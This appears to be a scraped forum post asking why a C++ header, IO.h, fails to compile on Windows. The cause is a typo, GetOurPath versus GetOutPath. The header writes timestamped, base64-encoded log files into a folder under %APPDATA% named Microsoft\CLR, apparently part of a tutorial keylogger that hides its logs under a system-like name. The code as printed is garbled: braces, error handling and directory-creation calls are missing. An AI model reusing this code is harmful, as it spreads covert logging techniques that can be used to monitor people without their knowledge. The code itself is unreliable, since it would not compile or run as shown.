jeudi 29 mars 2018

IO Code for windows giving declaration error

While writing a code IO part of windows CodeBlocks is giving some form of error which I don't seem to figure out.

#ifndef IO_H
#define IO_H

#include <string>
#include <cstdlib>
#include <fstream>
#include "windows.h"
#include "Helper.h"
#include "Base64.h"

namespace IO
    std::string GetOutPath(const bool append_seperator = false)
        std::string appdata_dir(getenv("APPDATA"));
        std::string full = appdata_dir + "\\Microsoft\\CLR";
        return full + (append_seperator ? "\\" : "");
    bool MkOneDr(std::string path)
        return (bool) CreateDirectory(path.c_str(), NULL) ||
        GetLastError() == ERROR_ALREADY_EXISTS;
    bool MKDir(std::string path)
        for(char &c : path)
            if(c == '\\')
                c = '\0';
                    return false;
                c = '\\';
        return true;
    template <class T>
    std::string WriteLog(const T &t)
        std::string path = GetOurPath(true);
        Helper::DateTime dt;
        std::string name = dt.GetDateTimeString("_") + ".log";

            std::ofstream file(path + name);
            if(!file) return "";
            std::ostringstream s;
            s << "[" << dt.GetDateTimeString() << "]" <<
            std::endl << t << std::endl;
            std::string data = Base64::EncryptB64(s.str());
            file << data;
            return "";
            return name;
            return "";
#endif // IO_H

Error: IO.h|41|error: there are no arguments to 'GetOurPath' that depend on a template parameter, so a declaration of 'GetOurPath' must be available [-fpermissive]|

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